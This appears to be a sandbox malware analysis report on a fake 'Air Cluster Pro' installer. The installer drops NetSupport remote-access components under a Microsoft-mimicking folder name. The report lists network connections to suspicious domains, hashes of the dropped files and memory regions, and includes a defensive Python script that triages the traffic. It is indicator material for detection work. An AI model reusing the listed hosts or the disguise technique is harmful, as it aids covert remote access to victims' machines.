US 8.8.8.8:53 www.msn.com udp
US 204.79.197.203:443 www.msn.com tcp
US 204.79.197.203:443 www.msn.com tcp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 13.107.246.67:443 edgestatic.azureedge.net tcp
US 13.107.246.67:443 edgestatic.azureedge.net tcp
US 13.107.246.67:443 edgestatic.azureedge.net tcp
US 13.107.246.67:443 edgestatic.azureedge.net tcp
US 13.107.246.67:443 edgestatic.azureedge.net tcp
US 13.107.246.67:443 edgestatic.azureedge.net tcp
US 8.8.8.8:53 67.246.107.13.in-addr.arpa udp
US 8.8.8.8:53 assets.msn.com udp
GB 95.101.143.155:443 assets.msn.com tcp
GB 95.101.143.155:443 assets.msn.com tcp
GB 95.101.143.155:443 assets.msn.com tcp
GB 95.101.143.155:443 assets.msn.com tcp
US 8.8.8.8:53 155.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 63.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 www.winfreycmh.pw udp
GB 23.106.59.48:80 www.winfreycmh.pw tcp
US 8.8.8.8:53 77.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 48.59.106.23.in-addr.arpa udp
GB 23.106.59.48:80 www.winfreycmh.pw tcp
GB 23.106.59.48:80 www.winfreycmh.pw tcp
GB 23.106.59.48:80 www.winfreycmh.pw tcp
GB 23.106.59.48:80 www.winfreycmh.pw tcp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 msedge.api.cdp.microsoft.com udp
US 20.114.58.89:443 msedge.api.cdp.microsoft.com tcp
US 8.8.8.8:53 89.58.114.20.in-addr.arpa udp
US 8.8.8.8:53 msedge.f.tlu.dl.delivery.mp.microsoft.com udp
NL 178.79.208.1:80 msedge.f.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
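The Network table mixes three kinds of traffic and reads best once they are separated. The microsoft.com, bing.com, msn.com, azureedge.net and login.microsoftonline.com rows come from the Edge/WebView2 installation and first run visible in the process list; geo.netsupportsoftware.com is the NetSupport client checking in with its vendor, expected for NetSupport but not for an "Air Cluster Pro" installer; everything else (yearcoal.online, geesemonth.xyz, www.cobaltshoesx.com, koppertrain.top on port 1203, str.skymiddle.host, act.reactionharbor.xyz, www.mildstat.com, www.mminnn.com, www.winfreycmh.pw, axsboe-campaign.com) is not explained by the installed software and is where review starts. The in-addr.arpa rows are the sandbox's reverse lookups, not sample activity. The script below is an added example, not part of the report: it parses rows in this table's format, drops resolver and PTR noise, deduplicates connections, classifies by domain suffix (the allowlist is mine and only as good as its contents) and puts the non-standard port at the top of the review queue. Two caveats: "expected" means consistent with the components seen installing, not benign; and several review hosts sit behind shared front ends (two different domains above resolve to 188.114.96.0), so block and hunt on domain names rather than on these IPs.

```python
"""Triage the Network table of a sandbox report: separate the traffic the
dropped components are expected to produce from hosts that need review."""
import ipaddress
from collections import OrderedDict

# Excerpt of the Network table above, copied row for row from the report.
NETWORK_ROWS = """\
US 8.8.8.8:53 yearcoal.online udp
US 172.67.220.175:80 yearcoal.online tcp
US 8.8.8.8:53 175.220.67.172.in-addr.arpa udp
US 8.8.8.8:53 www.cobaltshoesx.com udp
US 149.102.225.29:443 www.cobaltshoesx.com tcp
DE 45.15.157.190:1203 koppertrain.top tcp
US 188.114.96.0:80 str.skymiddle.host tcp
GB 51.142.119.24:80 geo.netsupportsoftware.com tcp
US 188.114.96.0:80 act.reactionharbor.xyz tcp
GB 23.106.59.52:80 www.mildstat.com tcp
US 172.67.213.153:443 axsboe-campaign.com tcp
US 172.67.213.153:443 axsboe-campaign.com tcp
NL 95.101.74.134:443 www.bing.com tcp
NL 40.126.32.76:443 login.microsoftonline.com tcp
US 13.107.246.67:443 edgestatic.azureedge.net tcp
GB 23.106.59.48:80 www.winfreycmh.pw tcp
NL 178.79.208.1:80 msedge.f.tlu.dl.delivery.mp.microsoft.com tcp
"""

# Edge/WebView2 setup and first run explain the Microsoft/Bing/MSN rows. The
# NetSupport client checks in with its vendor's geolocation service, so that
# row is kept but labelled on its own: expected for NetSupport, not for a
# genuine "Air Cluster Pro" installer. Both lists are this example's own.
EXPECTED_SUFFIXES = (".microsoft.com", ".bing.com", ".msn.com",
                     ".azureedge.net", ".microsoftonline.com")
NETSUPPORT_SUFFIXES = (".netsupportsoftware.com",)
COMMON_PORTS = {53, 80, 443}


def classify(domain: str) -> str:
    host = "." + domain.lower()
    if host.endswith(NETSUPPORT_SUFFIXES):
        return "netsupport"
    if host.endswith(EXPECTED_SUFFIXES):
        return "expected"
    return "review"


def triage(rows: str) -> list:
    """One record per unique (domain, ip, port) connection. Reverse lookups
    are sandbox noise and are dropped; a domain that was resolved but never
    connected to is kept as a 'dns' record so it is not lost."""
    seen, resolved = OrderedDict(), []
    for line in rows.splitlines():
        parts = line.split()
        if len(parts) != 4 or ":" not in parts[1]:
            continue                      # header line or malformed row
        country, dest, domain, proto = parts
        if domain.endswith(".in-addr.arpa"):
            continue
        ip, _, port = dest.rpartition(":")
        port = int(port)
        if port == 53 and proto == "udp":
            resolved.append(domain)       # the query; any connection is its own row
            continue
        key = (domain, ip, port)
        if key in seen:
            seen[key]["hits"] += 1
            continue
        seen[key] = {"domain": domain, "ip": str(ipaddress.ip_address(ip)),
                     "port": port, "proto": proto, "country": country,
                     "category": classify(domain),
                     "odd_port": port not in COMMON_PORTS, "hits": 1}
    connected = {r["domain"] for r in seen.values()}
    for domain in resolved:
        if domain not in connected and ("dns", domain) not in seen:
            seen[("dns", domain)] = {"domain": domain, "ip": None, "port": None,
                                     "proto": "dns", "country": None,
                                     "category": classify(domain),
                                     "odd_port": False, "hits": 1}
    return list(seen.values())


def review_queue(rows: str) -> list:
    """Hosts to look at first: not explained by the installed components,
    with non-standard ports sorted to the top."""
    items = [r for r in triage(rows) if r["category"] == "review"]
    return sorted(items, key=lambda r: (not r["odd_port"], r["domain"]))
```

Feed review_queue the whole table rather than the excerpt; the header row is skipped because its second field has no port, and repeated connections to one host collapse into a single record with a hit count, which is what a blocklist or a hunt query needs.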

Files

memory/4624-117-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp

MD5 c1186d360e7b3db56757bc78a428f486
SHA1 2018c76fa571ce86c8beddc70589aab0a380e3e4
SHA256 999b0adc768a8a974e04fa9fe6c44abf026b0847ba1926b2513236ef90334ab5
SHA512 af2e6084f25ca2745421f227868f214d5e12c3ee23f7ee52d35b57705d1b7c3adb5863549738e673288b7fd5ac959a6e47f52f7397af374fa8a04080cfc9e502

memory/4220-123-0x0000000000880000-0x0000000000881000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe

MD5 1f9ae83f27ee5f9ab56ee579acde7058
SHA1 1c643006c709a17ebc18b17302c03d4c1df81f71
SHA256 777bd6a701233ece4dc1166f229888d4d7aafbff73c5b2d7852d42e92b291a7f
SHA512 ddf6fb75b30878f75624217abc7945b9331e598aee62709f92fff569b571427424d448d0f3ac222a6c737a0a6859b299e9c519feb6e99956818a37f908143097

memory/4372-145-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp

MD5 f8a2f4a300c0655e6681f5b6b3a20c27
SHA1 e8a3971dca03c4be5cf483fcef04b14a32d22eba
SHA256 09413d7208f0b830bb7e7e4f8d421e6ca83c5336b7abfc8428e8ba756e87be22
SHA512 db7b946804f46e0dc03db2aa5c259caf893758f47dd5e7c2a6320081b3f52b44d6714fcfadc08f40f8f269cd0c5d458aaca7f35d1fb4e843b6424acf921f859c

memory/4624-150-0x0000000000400000-0x00000000004D8000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-I5072.tmp\_isetup\_isdecmp.dll

MD5 077cb4461a2767383b317eb0c50f5f13
SHA1 584e64f1d162398b7f377ce55a6b5740379c4282
SHA256 8287d0e287a66ee78537c8d1d98e426562b95c50f569b92cea9ce36a9fa57e64
SHA512 b1fcb0265697561ef497e6a60fcee99dc5ea0cf02b4010da9f5ed93bce88bdfea6bfe823a017487b8059158464ea29636aad8e5f9dd1e8b8a1b6eaaab670e547

memory/4220-153-0x0000000000400000-0x000000000071C000-memory.dmp

memory/4204-162-0x0000000000950000-0x0000000000951000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-I5072.tmp\idp.dll

MD5 55c310c0319260d798757557ab3bf636
SHA1 0892eb7ed31d8bb20a56c6835990749011a2d8de
SHA256 54e7e0ad32a22b775131a6288f083ed3286a9a436941377fc20f85dd9ad983ed
SHA512 e0082109737097658677d7963cbf28d412dca3fa8f5812c2567e53849336ce45ebae2c0430df74bfe16c0f3eebb46961bc1a10f32ca7947692a900162128ae57

memory/4372-172-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/4204-174-0x0000000000400000-0x000000000071C000-memory.dmp

memory/4204-175-0x0000000000950000-0x0000000000951000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe

MD5 52742e7ca3ab70176f9e7797be655e1f
SHA1 46240ce20582f88513bf1fc86db6a749d97cb75d
SHA256 4ec6ccb79b66699a67b7df4275f4abc87421a2e1a75b15f528ed9964aa5fffb4
SHA512 41e77621d8f2911b316ce27636dc2ddf509f98ad3a17a60258e36599613131b20068050dcdc02c072a3d4d08ffb3396d6ae50aca2034c21dfc35db5bd825541d

memory/4192-179-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp

MD5 35641ce29349e4ff8019362c2f1a6713
SHA1 4bde30eb8814b07ae39ad72516071b1abc9e4f70
SHA256 b09afb08306f1e125e35d0224ec3e33be32d6efc9691fe0803e9fdd87d440b83
SHA512 0c13469f714e7511f5f4f2cbca39e614ac65e8077683ed5a67153e81a02d9d7768e696981881f31ca02c23db9e961c0fe64ad1e01630a1ffb4f360bffd3915a2

memory/1036-186-0x0000000000990000-0x0000000000991000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-V1SDH.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/4204-193-0x0000000000400000-0x000000000071C000-memory.dmp

\??\c:\users\admin\appdata\local\temp\is-v1sdh.tmp\{app}\cvysapfvmvsjevb.cab

MD5 311b9064d72279593f2e540468d02928
SHA1 3b48b75468fd479c618d94a1a9af4b30cfbc19f0
SHA256 43d5335af9a54cfec3bb22ab903066ee1415b85d8668975ffdb4e4e06962fd91
SHA512 054bd0d323dac576d8831e9049c695bca5b052ec33f03122995e0287fc9cf4b7547d794eca5214db11e8bc8582d27931d68e1bd7edfcaeee4fa161d23a130486

C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe

MD5 c0eb3eac96511077dafc0afa64c6388c
SHA1 33e81f25493eda3bbf0b7cdcddd523547fa6c31e
SHA256 eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a
SHA512 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc

C:\ProgramData\regid.1993-06.com.microsoft\PCICL32.dll

MD5 d3d39180e85700f72aaae25e40c125ff
SHA1 f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15
SHA256 38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5
SHA512 471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

\ProgramData\regid.1993-06.com.microsoft\pcicapi.dll

MD5 34dfb87e4200d852d1fb45dc48f93cfc
SHA1 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
SHA256 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
SHA512 f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

C:\ProgramData\regid.1993-06.com.microsoft\pcicapi.dll

MD5 34dfb87e4200d852d1fb45dc48f93cfc
SHA1 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
SHA256 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
SHA512 f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

C:\ProgramData\regid.1993-06.com.microsoft\MSVCR100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

\ProgramData\regid.1993-06.com.microsoft\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

\ProgramData\regid.1993-06.com.microsoft\PCICHEK.DLL

MD5 104b30fef04433a2d2fd1d5f99f179fe
SHA1 ecb08e224a2f2772d1e53675bedc4b2c50485a41
SHA256 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
SHA512 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

C:\ProgramData\regid.1993-06.com.microsoft\pcichek.dll

MD5 104b30fef04433a2d2fd1d5f99f179fe
SHA1 ecb08e224a2f2772d1e53675bedc4b2c50485a41
SHA256 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
SHA512 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

\ProgramData\regid.1993-06.com.microsoft\PCICL32.DLL

MD5 d3d39180e85700f72aaae25e40c125ff
SHA1 f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15
SHA256 38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5
SHA512 471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

C:\ProgramData\regid.1993-06.com.microsoft\client32.ini

MD5 ae72e7e3fcb4807d9b72e3797f7180d1
SHA1 d3891f3987b12221e7fdb44c61f6fcc808b8cf18
SHA256 bae70a72f9f759e748f04ee3241fd228775746823f4c912085fae4f63edb075c
SHA512 9aeda2de2970d07c09846da4533488e50c0c036dee88dac40cf19c556f59bf47cf65943d293b8299c254b73f8ff30f2a86176684a94cab6700dff2f3e5940a67

C:\ProgramData\regid.1993-06.com.microsoft\NSM.LIC

MD5 e9609072de9c29dc1963be208948ba44
SHA1 03bbe27d0d1ba651ff43363587d3d6d2e170060f
SHA256 dc6a52ad6d637eb407cc060e98dfeedcca1167e7f62688fb1c18580dd1d05747
SHA512 f0e26aa63b0c7f1b31074b9d6eef88d0cfbc467f86b12205cb539a45b0352e77ce2f99f29baeab58960a197714e72289744143ba17975699d058fe75d978dfd0

memory/1036-270-0x0000000000400000-0x000000000071B000-memory.dmp

\ProgramData\regid.1993-06.com.microsoft\TCCTL32.DLL

MD5 2c88d947a5794cf995d2f465f1cb9d10
SHA1 c0ff9ea43771d712fe1878dbb6b9d7a201759389
SHA256 2b92ea2a7d2be8d64c84ea71614d0007c12d6075756313d61ddc40e4c4dd910e
SHA512 e55679ff66ded375a422a35d0f92b3ac825674894ae210dbef3642e4fc232c73114077e84eae45c6e99a60ef4811f4a900b680c3bf69214959fa152a3dfbe542

C:\ProgramData\regid.1993-06.com.microsoft\TCCTL32.DLL

MD5 2c88d947a5794cf995d2f465f1cb9d10
SHA1 c0ff9ea43771d712fe1878dbb6b9d7a201759389
SHA256 2b92ea2a7d2be8d64c84ea71614d0007c12d6075756313d61ddc40e4c4dd910e
SHA512 e55679ff66ded375a422a35d0f92b3ac825674894ae210dbef3642e4fc232c73114077e84eae45c6e99a60ef4811f4a900b680c3bf69214959fa152a3dfbe542

C:\ProgramData\regid.1993-06.com.microsoft\HTCTL32.DLL

MD5 c94005d2dcd2a54e40510344e0bb9435
SHA1 55b4a1620c5d0113811242c20bd9870a1e31d542
SHA256 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899
SHA512 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

\ProgramData\regid.1993-06.com.microsoft\HTCTL32.DLL

MD5 c94005d2dcd2a54e40510344e0bb9435
SHA1 55b4a1620c5d0113811242c20bd9870a1e31d542
SHA256 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899
SHA512 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

memory/4192-277-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/3580-285-0x0000016DCEC20000-0x0000016DCEC30000-memory.dmp

memory/3580-301-0x0000016DCF400000-0x0000016DCF410000-memory.dmp

memory/3580-320-0x0000016DCDEF0000-0x0000016DCDEF2000-memory.dmp

memory/1612-333-0x00000214F0CF0000-0x00000214F0CF2000-memory.dmp

memory/1612-335-0x00000214F0D10000-0x00000214F0D12000-memory.dmp

memory/1612-337-0x00000214F0D20000-0x00000214F0D22000-memory.dmp

memory/3696-371-0x000001F6E0BD0000-0x000001F6E0BD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe

MD5 85e2c06cc69d7d599c27f2263f177cb0
SHA1 0e732481ca4a5596a91cc0881e6328fec88c617c
SHA256 aa280c9f0d83a2f8d79537db3e810c70a7b841fb1769d0ea4e0d2860b1de8f93
SHA512 64e0b28dca708f1cb7573c5bd0dfd95bef09f5e615bd06cca8530afdd718e1975a1635991f32cb974b8ae7c24a980b6960bd77243db8f1caad3c4f98bfb6a6c3

memory/3696-376-0x000001F6E0BF0000-0x000001F6E0BF2000-memory.dmp

\Users\Admin\AppData\Local\Temp\nsx582E.tmp\nsExec.dll

MD5 b38561661a7164e3bbb04edc3718fe89
SHA1 f13c873c8db121ba21244b1e9a457204360d543f
SHA256 c2c88e4a32c734b0cb4ae507c1a9a1b417a2375079111fb1b35fab23aedd41d9
SHA512 fedcaac20722de3519382011ccf22314af3edcd11b69f814db14710966853b69b9b5fc98383edcdb64d050ff825264eaba27b1c5adfe61d1fc9d77f13a052ced

memory/3696-390-0x000001F6E0C50000-0x000001F6E0C52000-memory.dmp

memory/3696-392-0x000001F6E0D10000-0x000001F6E0D12000-memory.dmp

memory/3696-385-0x000001F6E0C30000-0x000001F6E0C32000-memory.dmp

memory/3696-396-0x000001F6E0D30000-0x000001F6E0D32000-memory.dmp

memory/3580-395-0x0000016DD57E0000-0x0000016DD57E1000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\AUYRIHZ2\favicon-trans-bg-blue-mg-png[1].png

MD5 c7a1030c2b55d7d8a514b120dd855cc0
SHA1 d07abbcf44b932732e4c0b0bf31e4283ae0f4b5b
SHA256 7c5bb9ca2fa67fe7851d145305e17a8370c4aec9d09f54e0920d32f6148f12fa
SHA512 1b51972a1ae1be2e85b9b125d7e2443c1b47abbbba9492d4ad52bdf0f9cf82513eca3ce436f9beedb7463a6f7b39ddd87245daf790226255a2b0d478dc380b81

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\do32.bat

MD5 24e07246f0e8f5b0029ae7167b667ace
SHA1 63f61a2585ff45f17c168be18164afdd448773f2
SHA256 667e5c9cbe8d6d58e61a2628ebcbd6986d8701ac5670fda668d999794f0eecf9
SHA512 0611bfb6815ddc8d881908ba39f956b21ca99179cf04dcabfded3b5d98e13c9afd11b35504dbb9956cbe8f685142adf6ab5fbd1f3605c316903f4e631ab9dc8f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe

MD5 93b828ed97cb2c701364df520ddd5331
SHA1 cd8b4b8499d14a0e44de3dc855aa5a8ba588e3d9
SHA256 9e2e0f10f6dde0e19e441dec7a6f14a813e5d39e9d7f70b2b48b88491f69bb9b
SHA512 86ef1caf8102a119c239e62af416aa07d85bdd0fa6815beab075a7b68dec3f8da293a309d915683010b6f7476f85ef38c9f5a8ff518b1f0a1edb15884713b4b9

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

MD5 71c7975385f73ae32b06f69dbe79290b
SHA1 05a1197cb8bd88447199e42a75bfcf99e32f2c48
SHA256 c0abbeea8ae726503bc5643f3471e378d92fcb59a37043062bbf9ba64d95004c
SHA512 1a6549788e97e5d07560f58dc11088424f0f90815f0ced2173be169ad4dbf0e55cd19b40fbf8f65d65e0f6cadb21c0489dc6a8de999859d12244879f4722ec95

C:\Users\Admin\AppData\Local\Temp\ynhkvfj

MD5 0b1607979373b4ed50c6d0b89eb157ab
SHA1 7c2f77f58d5cfbbddd572cef7e23d537567a7942
SHA256 1c80f750068ed4ca51348b189016113559a740215c4ff6593156fd5225272690
SHA512 3f6641421e8902432da2bedde2c870b3ed02a9f1e0ecbef78d66c968712817cdce37b6f4b74d666bb061933842e8ad62c5491ba44a38b3052296c74004dd9c56

C:\Windows\Temp\aut725C.tmp

MD5 1ae3520c92409d09b2596b55abcd1429
SHA1 89dcc61c00aa4244e166653dc31092350d868a66
SHA256 e0fe5cc20fc6257d8373a36cb2c87f4bd6ec9a97961ed0f795e48958e477fe78
SHA512 c8626cfd2b6ac659af8e627f08e32051e39ed06875ffb71acca6014ac104ac60c1b0de1cf397fa16146734eb3e5cfce4ae3b75843742ec89577330d6235d0845

memory/4560-1098-0x0000000006530000-0x0000000006566000-memory.dmp

memory/4560-1099-0x0000000006D40000-0x0000000007368000-memory.dmp

memory/4560-1101-0x0000000006B20000-0x0000000006B42000-memory.dmp

memory/4560-1105-0x0000000006700000-0x0000000006710000-memory.dmp

memory/4560-1106-0x0000000006700000-0x0000000006710000-memory.dmp

memory/4560-1107-0x0000000006C80000-0x0000000006CE6000-memory.dmp

memory/4560-1108-0x00000000074E0000-0x0000000007546000-memory.dmp

memory/4560-1109-0x00000000075D0000-0x0000000007920000-memory.dmp

memory/4560-1110-0x00000000074C0000-0x00000000074DC000-memory.dmp

memory/4560-1111-0x00000000079E0000-0x0000000007A2B000-memory.dmp

memory/4560-1112-0x0000000007CF0000-0x0000000007D66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uf32lgii.ta3.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4560-1129-0x0000000008B60000-0x0000000008B93000-memory.dmp

memory/4560-1130-0x0000000008B40000-0x0000000008B5E000-memory.dmp

memory/4560-1135-0x0000000008CA0000-0x0000000008D45000-memory.dmp

memory/4560-1136-0x0000000009060000-0x00000000090F4000-memory.dmp

memory/4560-1139-0x000000007E980000-0x000000007E990000-memory.dmp

memory/4560-1140-0x0000000006700000-0x0000000006710000-memory.dmp

memory/4560-1331-0x0000000009010000-0x000000000902A000-memory.dmp

memory/4560-1336-0x0000000009000000-0x0000000009008000-memory.dmp

memory/316-1354-0x00000000076A0000-0x00000000079F0000-memory.dmp

memory/316-1355-0x0000000007F20000-0x0000000007F6B000-memory.dmp

memory/316-1356-0x0000000006A30000-0x0000000006A40000-memory.dmp

memory/316-1357-0x0000000006A30000-0x0000000006A40000-memory.dmp

memory/316-1373-0x0000000008D90000-0x0000000008DAA000-memory.dmp

memory/316-1372-0x0000000009650000-0x0000000009CC8000-memory.dmp

memory/3144-1388-0x0000000006A90000-0x0000000006AA0000-memory.dmp

memory/3144-1387-0x0000000006A90000-0x0000000006AA0000-memory.dmp

memory/3144-1410-0x0000000006A90000-0x0000000006AA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\nsExec.dll

MD5 b38561661a7164e3bbb04edc3718fe89
SHA1 f13c873c8db121ba21244b1e9a457204360d543f
SHA256 c2c88e4a32c734b0cb4ae507c1a9a1b417a2375079111fb1b35fab23aedd41d9
SHA512 fedcaac20722de3519382011ccf22314af3edcd11b69f814db14710966853b69b9b5fc98383edcdb64d050ff825264eaba27b1c5adfe61d1fc9d77f13a052ced

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe

MD5 1fb64ff73938f4a04e97e5e7bf3d618c
SHA1 aa0f7db484d0c580533dec0e9964a59588c3632b
SHA256 4efc87b7e585fcbe4eaed656d3dbadaec88beca7f92ca7f0089583b428a6b221
SHA512 da6007847ffe724bd0b0abe000b0dd5596e2146f4c52c8fe541a2bf5f5f2f5893dccd53ef315206f46a9285ddbd766010b226873038ccac7981192d8c9937ece

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\NUAQS3XK\edgecompatviewlist[1].xml

MD5 d4fc49dc14f63895d997fa4940f24378
SHA1 3efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256 853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512 cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

C:\Windows\Temp\arwjshw

MD5 940b1915cadee0e2b33d80799816f6c7
SHA1 2c10e4fec3e8c054055d1ed78757117575f273f2
SHA256 81e89e7266cfe5158e44f5578c8be61353e781daebdd47a33597e9ec503d379c
SHA512 cc3c574fd5392c1b54146b591e22b1c01c95e34a602c403ad96c49b7ee6ad31d1478a00cc1334286addc5cb94496372a172745e9ad20554023e1e22c7da1e1c5

C:\Users\Admin\AppData\Local\Temp\autD1F1.tmp

MD5 436c1bb98deeccecb73fad945f1dd3dc
SHA1 774313ba911945589971bbc73498d81f060dabe6
SHA256 05eae1691149cc66e458d5e5b4430bd3b938b278b8bdb2c887a13c9871004c51
SHA512 66ea41b9b4a42f7c40d1ce5b6e82a6f03e8489648b912d96a81efa13d340d4d651078df7c1302c595ca83408e7208d1d79f02165dc27383952a9abe7f851c3e2

memory/6020-2000-0x0000000004FA0000-0x0000000004FB0000-memory.dmp

memory/6020-2001-0x0000000004FA0000-0x0000000004FB0000-memory.dmp

memory/6020-2014-0x0000000009DE0000-0x0000000009E85000-memory.dmp

memory/6020-2015-0x000000007F190000-0x000000007F1A0000-memory.dmp

memory/6020-2016-0x0000000004FA0000-0x0000000004FB0000-memory.dmp

memory/5288-2434-0x0000000008390000-0x00000000083DB000-memory.dmp

memory/5288-2435-0x00000000049F0000-0x0000000004A00000-memory.dmp

memory/5288-2436-0x00000000049F0000-0x0000000004A00000-memory.dmp

memory/5740-2455-0x0000000006960000-0x0000000006970000-memory.dmp

memory/5740-2456-0x0000000006960000-0x0000000006970000-memory.dmp

memory/5216-2483-0x0000000000F60000-0x0000000000F68000-memory.dmp

memory/4532-2484-0x0000000000320000-0x0000000000328000-memory.dmp

memory/5216-2485-0x0000000002FD0000-0x0000000002FE0000-memory.dmp

memory/4532-2486-0x0000000002340000-0x0000000002350000-memory.dmp

memory/5316-2503-0x00000000026D0000-0x00000000026E0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.new

MD5 b7f76108313ef044e44c8b020c4ba74b
SHA1 efa022de57a8f2e89d6f831638458ad7adaa891a
SHA256 38f420628058b69f5e993ca0b399716dbb09eebd9d6bb32e7c0b92446ac7618d
SHA512 631fd46017b8763756c410bfbdff82c0248425abbcc8cef5cc4010ba0b568fd565e7f64f0cddaed44c212c60e7210a1b9830ed69fc79956ceebc53bb40eddb04

memory/5552-2516-0x0000000003060000-0x0000000003070000-memory.dmp

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

MD5 4cb326ff5bdb251b9f92b35e4a4d7741
SHA1 26442b959c62db6604f6d0bffaab38ca39050b62
SHA256 38a44760c4b6fd553531d7f99f6f78110f488e57ee00d2fc498635ec7ab4a478
SHA512 9d62f48be43de8e6a60ee40f9e982c1906273b65c96299ae68e1f72e31b8f78dd01199b36f62e61836a2c0d84fc106ae550cf94ffe2cb9b6a082774cb8eedea4

